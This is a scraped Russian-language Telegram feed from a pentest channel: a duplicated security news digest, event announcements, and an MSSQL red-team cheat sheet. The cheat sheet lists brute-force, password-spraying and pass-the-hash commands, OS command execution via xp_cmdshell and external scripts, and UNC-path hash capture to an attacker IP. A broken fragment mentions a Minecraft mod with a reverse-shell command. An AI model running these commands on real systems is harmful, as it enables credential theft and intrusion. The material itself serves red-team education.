Добрый день, коллеги! ☕️
Новая неделя в самом разгаре. Предлагаем вам налить себе чашку кофе и вспомнить с нами события прошедшей недели!
💀 Атаки на IIS с использованием публичных ASP. NET Machine Keys
🔍 Microsoft Threat Intelligence обнаружила более 3,000 утекших ASP. NET machine keys, которые злоумышленники используют для атак на IIS-серверы. Эти ключи, найденные в публичных репозиториях и документации, позволяют атакующим выполнять ViewState-инъекции и разворачивать Godzilla Malware.
Как работает атака?
1️⃣ ViewState отвечает за сохранение состояния страниц в ASP. NET.
2️⃣ Для его защиты используются ValidationKey и DecryptionKey.
3️⃣ Если эти ключи утекли, атакующие создают вредоносный ViewState и отправляют его на сервер.
4️⃣ IIS доверяет ViewState и выполняет код с привилегиями веб-приложения.
Рекомендации от Microsoft:
✅ Не используйте публичные machine keys — генерируйте уникальные ключи.
✅ Проверяйте свои ключи по базе хешей публичных ключей
✅ Ротируйте machine keys — регулярное обновление снижает риск компрометации.
✅ Обновите ASP. NET до 4.8 и включите Antimalware Scan Interface (AMSI).
Подробнее об уязвимости и защите — Microsoft Blog
⌨️ Разбор LPE-уязвимости в AnyDesk
В сети опубликован анализ уязвимости в AnyDesk (CVE-2024-12754), позволяющей локальному злоумышленнику повысить привилегии до NT AUTHORITY\SYSTEM.
Как это работает?
Когда пользователь инициирует новую сессию, сервис AnyDesk копирует фоновое изображение рабочего стола в C:\Windows\Temp\, сохраняя оригинальное имя файла. Но поскольку низкопривилегированные пользователи могут создавать файлы в этой директории, атакующий может заранее создать файл с тем же именем. В результате служба AnyDesk перезаписывает этот файл с системными привилегиями, передавая злоумышленнику полный контроль.
💻 Для любителей покопаться в деталях, ребята из @RedTeambro подготовили Proof-of-Concept, который можно найти здесь: POC
📖 Подробный разбор уязвимости можно найти здесь: LPE AnyDesk research
🛡 Обновление безопасности Android
Google выпустила обновление безопасности для Android, устраняющее 47 уязвимостей, многие из которых являются критическими.
Наиболее критичные уязвимости:
CVE-2024-53104: Уязвимость высокой степени опасности в драйвере USB Video Class (UVC) ядра Linux. Проблема связана с некорректной обработкой видеокадров, что приводит к записи данных за пределами допустимых границ в функции uvc_parse_format(). Это позволяет злоумышленникам повышать привилегии, выполняя произвольный код или вызывая сбои устройства.
CVE-2024-45569: Критическая уязвимость в компонентах WLAN от Qualcomm с оценкой CVSS 9.8. Она связана с повреждением памяти из-за неправильной проверки индексов массива при обработке сетевых управляющих кадров, что может привести к удаленному выполнению кода.
Обновление доступно для устройств Google Pixel и будет постепенно распространяться на устройства других вендоров.
Подробнее ознакомиться с обновлением можно здесь
Всем продуктивной и насыщенной недели! Оставайтесь с нами. В ближайшее время добавим для вас больше разнообразного контента!
#news
Новая неделя в самом разгаре. Предлагаем вам налить себе чашку кофе и вспомнить с нами события прошедшей недели!
🔍 Microsoft Threat Intelligence обнаружила более 3,000 утекших ASP. NET machine keys, которые злоумышленники используют для атак на IIS-серверы. Эти ключи, найденные в публичных репозиториях и документации, позволяют атакующим выполнять ViewState-инъекции и разворачивать Godzilla Malware.
Как работает атака?
Рекомендации от Microsoft:
Подробнее об уязвимости и защите — Microsoft Blog
В сети опубликован анализ уязвимости в AnyDesk (CVE-2024-12754), позволяющей локальному злоумышленнику повысить привилегии до NT AUTHORITY\SYSTEM.
Как это работает?
Когда пользователь инициирует новую сессию, сервис AnyDesk копирует фоновое изображение рабочего стола в C:\Windows\Temp\, сохраняя оригинальное имя файла. Но поскольку низкопривилегированные пользователи могут создавать файлы в этой директории, атакующий может заранее создать файл с тем же именем. В результате служба AnyDesk перезаписывает этот файл с системными привилегиями, передавая злоумышленнику полный контроль.
📖 Подробный разбор уязвимости можно найти здесь: LPE AnyDesk research
Google выпустила обновление безопасности для Android, устраняющее 47 уязвимостей, многие из которых являются критическими.
Наиболее критичные уязвимости:
CVE-2024-53104: Уязвимость высокой степени опасности в драйвере USB Video Class (UVC) ядра Linux. Проблема связана с некорректной обработкой видеокадров, что приводит к записи данных за пределами допустимых границ в функции uvc_parse_format(). Это позволяет злоумышленникам повышать привилегии, выполняя произвольный код или вызывая сбои устройства.
CVE-2024-45569: Критическая уязвимость в компонентах WLAN от Qualcomm с оценкой CVSS 9.8. Она связана с повреждением памяти из-за неправильной проверки индексов массива при обработке сетевых управляющих кадров, что может привести к удаленному выполнению кода.
Обновление доступно для устройств Google Pixel и будет постепенно распространяться на устройства других вендоров.
Подробнее ознакомиться с обновлением можно здесь
Всем продуктивной и насыщенной недели! Оставайтесь с нами. В ближайшее время добавим для вас больше разнообразного контента!
#news
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9 5 1
Forwarded from Омский багхантер
Обнаружил хорошую доку по внутреннему пентесту/редтиму. Рокет сайнса здесь нет, но для актуализации знаний прям что надо.
Тоже самое, но только в виде репозитория: тык
Тоже самое, но только в виде репозитория: тык
swisskyrepo.github.io
Internal All The Things
Active Directory and Internal Pentest Cheatsheets
This media is not supported in your browser
VIEW IN TELEGRAM
Сначала я хотел оформить этот материал в виде статьи, но думаю, поста будет достаточно.
Я тут недавно заинтересовался темой доставки малварей через игры, в частности, через Minecraft, и прифигел от их количества. Думаю, не для кого не новость, что тем или иным образом возможно вставить вредоносный код внутрь исходного кода, например, невнимательным апрувом пул-реквеста, и он сохранится в последующих версиях, до момента обнаружения. Но в нашем случае всё гораздо легче.
Вернемся к майнкрафту. Так уж получилось, что на самую продаваемую игру в мире сделано самое большое количество модов. А мы знаем, что чем популярнее платформа, тем больше внимания на нее обращают хацкеры. В интернете полно историй про взлом клиентов и серверов через Minecraft, я даже как-то делал пост на эту тему.
Так вот, я решил создать
127.0.0.1 31337/tcp, а также чат-команда /reverseshell для создания шелла на заданный адрес. В будущем предполагается добавить побольше интересных нагрузок и красивый интерфейс внутри игры, но без импакта пользователю (если, конечно, он сам этого не захочетXD)Please open Telegram to view this post
VIEW IN TELEGRAM
На собеседованиях я часто спрашиваю про абьюз Microsoft SQL Server, и, к моему удивлению, многие знают о нём поверхностно. А ведь MSSQL широко используется в корпоративных сетях и при неправильной настройке может стать удобной точкой входа для атакующего.
В этом посте я постарался собрать основные техники абьюза MSSQL, которые помогут лучше понять возможные векторы атак, подготовиться к собеседованию и собрать ваши знания воедино.
Microsoft SQL Server (MSSQL) — это реляционная СУБД от Microsoft, активно используемая в корпоративных сетях для хранения и обработки данных.
Основные компоненты:
🔹 Database Engine — отвечает за хранение, обработку и управление данными.
🔹 SQL Server Agent — автоматизация задач (например, резервное копирование).
🔹 SQL Server Browser — помогает клиентам находить MSSQL-инстансы.
🔹 SSIS (SQL Server Integration Services) — инструмент для интеграции данных.
🔹 SSRS (SQL Server Reporting Services) — генерация отчетов.
🔹 SSAS (SQL Server Analysis Services) — аналитика и обработка данных.
Основные роли в MSSQL:
🔹 sysadmin — полные привилегии на сервере.
🔹 db_owner — полные права в конкретной базе данных.
🔹 db_datareader — доступ только на чтение данных.
🔹 db_datawriter — возможность изменять данные.
🔹 public — назначается всем пользователям по умолчанию и может давать больше доступа, чем кажется.
Способы аутентификации:
🔹Windows Authentication — через доменную аутентификацию (NTLM/Kerberos).
🔹 SQL Authentication — локальные учетные записи MSSQL (sa, пользовательские логины).
Обнаружение MSSQL в сети
Прежде чем “что-то” ломать, нам это “что-то” надо найти.
#PowerUpSQL
Get-SQLInstanceDomain
#nmap
nmap -p 1433 --script ms-sql-info <IP>
#Metasploit
auxiliary/scanner/mssql/mssql_ping
#go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
#brute force
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt
#password spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success
#Pass-the-Hash
netexec mssql example.com -u usernames.txt -H <NTLM_HASH> --continue-on-success
impacket-mssqlclient DOMAIN/user@IP -hashes <YourHash>
Основной процесс SQL Server — это sqlservr.exe. Даже если у учетной записи SQL Server в Windows нет высоких привилегий, в самом SQL Server она по умолчанию получает роль sysadmin.
Компрометация службы SQL Server может привести к компрометации всего домена!
Шаг 1: Найдём локальный SQL Server.
# PowerUpSQL
Get-SQLInstanceLocal
Шаг 2: Получаем учетную запись SQL Server
#PowerUpSQL
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name
Злоумышленник, имея доступ к MSSQL, может выполнить команды Windows на сервере. Может он это сделать следующими способами:
🔹CLR (Common Language Runtime) Assembly — это механизм в Microsoft SQL Server, который позволяет выполнять .NET-код (C#, VB.NET, etc.) внутри базы данных.
#PowerUpSQL
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
🔹OLE Automation Procedures — это механизм в Microsoft SQL Server, который позволяет запускать объекты COM (Component Object Model) напрямую из T-SQL.
#PowerUpSQL
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"
🔹xp_cmdshell - встроенная хранимая процедура в Microsoft SQL Server, которая позволяет выполнять команды Windows напрямую из T-SQL
#SQL Server CLI
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
#PowerUpSQL
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"
Please open Telegram to view this post
VIEW IN TELEGRAM
<продолжение>
🔹External Scripts (Python/R) - механизм в Microsoft SQL Server, который позволяет выполнять Python и R-код
👅 UNC Path Injection
Позволяет утянуть NetNTLM-хеш через SMB
🤪 Lateral Movement через Linked Servers
Linked Servers — это механизм в Microsoft SQL Server, который позволяет подключаться к другим SQL Server'ам или внешним базам данных (MySQL, Oracle, PostgreSQL, файловым источникам и т. д.)
На этом всё, друзья! 🎯
Всем удачного хакинга и до новых встреч!
#redteam
🔹External Scripts (Python/R) - механизм в Microsoft SQL Server, который позволяет выполнять Python и R-код
#SQL Server CLI
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO
#PowerUpSQL
#REMOTE
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
#LOCAL Instance
Get-SQLInstanceLocal | Invoke-SQLOSCmdPyrhon -Verbose -Command "whoami"
Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"
Позволяет утянуть NetNTLM-хеш через SMB
#SQL Server CLI
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';
#PowerUpSQL
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost
Linked Servers — это механизм в Microsoft SQL Server, который позволяет подключаться к другим SQL Server'ам или внешним базам данных (MySQL, Oracle, PostgreSQL, файловым источникам и т. д.)
#Просмотр связанных серверов
EXEC sp_linkedservers;
#Выполнение команды на удалённом сервере
EXEC ('whoami') AT [LINKED_SERVER];
#PowerUpSQL
#поиск связанных серверов
Get-SQLServerLink -Instance YourInstance -Verbose
#проверка прав на удаленном сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose
#включаем xp_cmdshell на linked сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"
На этом всё, друзья! 🎯
Всем удачного хакинга и до новых встреч!
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
У нас у всех сейчас плотный график работы (ну вы знаете, эти пентесты), поэтому стараемся выкладывать посты, как можем.
Сегодня я хочу показать, почему плохо использовать Notepad++ для создания временных пометок. Под капотом он раскидывает информацию из несохраненных вкладок по файлам в
%appdata%\notepad++\backup\, а на практике многие забывают удалять конфиденциальную информацию, так и оставив её висеть в файле. На гифке Давайте все будем секурными и почистим папку
backup 😼P. S. Я сейчас работаю над одной мега-штукой для канала. Должно получится круто, ждите новостей :)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥10 7🤯2😁1
Друзья, всем привет!!!🤗
Наши друзья с канала «СБПроБизнес» отмечают свой день рождения и приглашают всех на большой праздничный стрим!👍
📅 Сегодня, 13 марта
⏰ Старт в 12:00 МСК
📍 Канал «СБПроБизнес»
🔗 Ссылка на стрим: https://t.me/sbprobiz/1693
Что вас ждет
🔹 12:00–13:00 — Алексей Швецкий
Тема: «Зачем бизнесу безопасник? Как понять, что мы молодцы?»
🔹 13:00–14:00 — Игорь Бедеров
Тема: «Стань ближе к информационной безопасности!»
🔹 14:00–15:00 — Александр Негода
Тема: «От мифов к реальной защите: роль пентеста в безопасности бизнеса»
😑 А вот тут говорят будет особенно интересно! Наш автор расскажет, зачем бизнесу на самом деле нужен пентест и почему он так важен🙂
🔹 15:00–16:00 — Сергей Суйков
Тема: «Кодекс этики: клятва пионера или свод обычаев?»
🔹 16:00–17:00 — Александр Елин
Тема: «Управление на основе данных. Мобильный цифровой ситуационный центр: примеры из жизни»
🔹 17:00–18:00 — Алексей Меркулов
Тема: «Защита от социальных инженеров»
❕ Важно, этот эфир будет не о технических нюансах, а о том, как безопасность помогает бизнесу развиваться, зарабатывать и защищаться от рисков.
Если интересна эта тема и вы хотите больше в ней разобраться, — этот стрим для вас!🐾
Наши друзья с канала «СБПроБизнес» отмечают свой день рождения и приглашают всех на большой праздничный стрим!
Что вас ждет
🔹 12:00–13:00 — Алексей Швецкий
Тема: «Зачем бизнесу безопасник? Как понять, что мы молодцы?»
🔹 13:00–14:00 — Игорь Бедеров
Тема: «Стань ближе к информационной безопасности!»
🔹 14:00–15:00 — Александр Негода
Тема: «От мифов к реальной защите: роль пентеста в безопасности бизнеса»
🔹 15:00–16:00 — Сергей Суйков
Тема: «Кодекс этики: клятва пионера или свод обычаев?»
🔹 16:00–17:00 — Александр Елин
Тема: «Управление на основе данных. Мобильный цифровой ситуационный центр: примеры из жизни»
🔹 17:00–18:00 — Алексей Меркулов
Тема: «Защита от социальных инженеров»
Если интересна эта тема и вы хотите больше в ней разобраться, — этот стрим для вас!
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
СБ Про Бизнес | Безопасность
Друзья, наш день рождения уже близко! 🎉
Канал «СБПроБизнес» скоро отметит свой праздник, и мы приглашаем вас разделить его с нами!
Ждём всех 13 марта с 12:00 МСК на ПРАЗДНИЧНЫЙ СТРИМ
Вас ждут полезные подарки — живые эфиры и общение с экспертами.
…
Канал «СБПроБизнес» скоро отметит свой праздник, и мы приглашаем вас разделить его с нами!
Ждём всех 13 марта с 12:00 МСК на ПРАЗДНИЧНЫЙ СТРИМ
Вас ждут полезные подарки — живые эфиры и общение с экспертами.
…
❤🔥5 3
💥 Привет!
А тем временем нас набралось уже 800 кулхацкеров🤯 (УК РФ Статья 272.1: "не блечить"). Спасибо, что вы с нами.
P. S. Думаю, на 1к пора будет создать холиварный чат канала
А тем временем нас набралось уже 800 кулхацкеров
P. S. Думаю, на 1к пора будет создать холиварный чат канала
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет, друзья🐾
Делимся с вами записью эфира в честь дня рождения телеграмм канала СБПроБизнес.
Спикер - Александр Негода (@closed_character).
Тема выступления:
От мифов к реальной защите бизнеса: какую роль играет пентест в безопасности бизнеса?
Посмотреть видео можете по ссылкам:
📺 Rutube
📝 Дзен
📺 ВК
📺 YouTube
Делимся с вами записью эфира в честь дня рождения телеграмм канала СБПроБизнес.
Спикер - Александр Негода (@closed_character).
Тема выступления:
От мифов к реальной защите бизнеса: какую роль играет пентест в безопасности бизнеса?
Посмотреть видео можете по ссылкам:
Please open Telegram to view this post
VIEW IN TELEGRAM
Все мы хоть раз в той или иной степени прикасались
Ну вроде всё. Всем желаю находить время на CTF, играть в кайф в команде или в соло, и побежать (опционально)
Please open Telegram to view this post
VIEW IN TELEGRAM
Друзья! у нас новый логотип канала. На него были потрачены все наши силы, а главное, НЕ использовались нейросети. Всем хорошего дня
😁8 8🌚5
А я тут недавно обзавелся данным произведением. Пролистал поверхностно и прочитал первую главу — В книге наглядно описывается работа редтима, как способ повышения защищенности в организациях. Да и текст в целом написан простым языком и читается довольно просто. Так, что если вы все ещё не до конца понимаете отличие редтима от пентеста, но знаете английский, то рекомендую к прочтению —
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет! 👋
Недавно разбирали кейс в котором было столько моментов, которые должны были навести на мысль, что что то тут не так, но человек шел до победного, как говорится: вижу цель, не вижу препятствий, мне нужна эта малварь! Чуть подробнее можно почитать тут - 🔗 ссылка на notion.so
Недавно разбирали кейс в котором было столько моментов, которые должны были навести на мысль, что что то тут не так, но человек шел до победного, как говорится: вижу цель, не вижу препятствий, мне нужна эта малварь! Чуть подробнее можно почитать тут - 🔗 ссылка на notion.so
А я тут провел небольшой ресерч по поводу пивотинга и в частности связка proxychains + nmap. Для поста материала оказалось много, поэтому
Приятного просмотра.
Please open Telegram to view this post
VIEW IN TELEGRAM
pyfffe on Notion
Proxychains под капотом | Notion
Привет, думаю каждый знает утилиту proxychains, но не все могут понимать, как она работает под капотом, как её правильно пользоваться и почему не всегда в паре с ней работает nmap (и не только он).
Привет, друзья❤️ !
Пока мы затаились в преддверии стендофыча, ловите порцию Битрикса
Пока мы затаились в преддверии стендофыча, ловите порцию Битрикса
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥3 3 1
Forwarded from APT
🔐 Bitrix CMS Ultimate Pentest Guide
A detailed guide on penetration testing for 1C-Bitrix CMS, one of the most popular content management systems in CIS countries. The guide covers authentication bypasses, XSS, SSRF, LFI, RCE exploits, WAF bypass methods, and vulnerabilities in third-party modules (especially Aspro).
🔗 Source:
https://pentestnotes.ru/notes/bitrix_pentest_full/
#1c #bitrix #web
A detailed guide on penetration testing for 1C-Bitrix CMS, one of the most popular content management systems in CIS countries. The guide covers authentication bypasses, XSS, SSRF, LFI, RCE exploits, WAF bypass methods, and vulnerabilities in third-party modules (especially Aspro).
🔗 Source:
https://pentestnotes.ru/notes/bitrix_pentest_full/
#1c #bitrix #web
А я тут недавно поиграл в standoff 15 и хочу высказать своё объективно-субъективное мнение:
В целом полигон норм, я ранее делал пост про HTB Pro Labs, и в сравнении с ними он очень даже неплохой. Инфра не вайпается глобально каждые 24 часа, можно попрактиковать сканирование и закрепление. Уязвимости и таски тоже в целом неплохие,
Теперь то, что особенно запомнилось:
В целом ощущение от игры 50 на 50. можно было бы принять синюю таблетку, гулять по PHD и быть в неведении внутренней кухни
Please open Telegram to view this post
VIEW IN TELEGRAM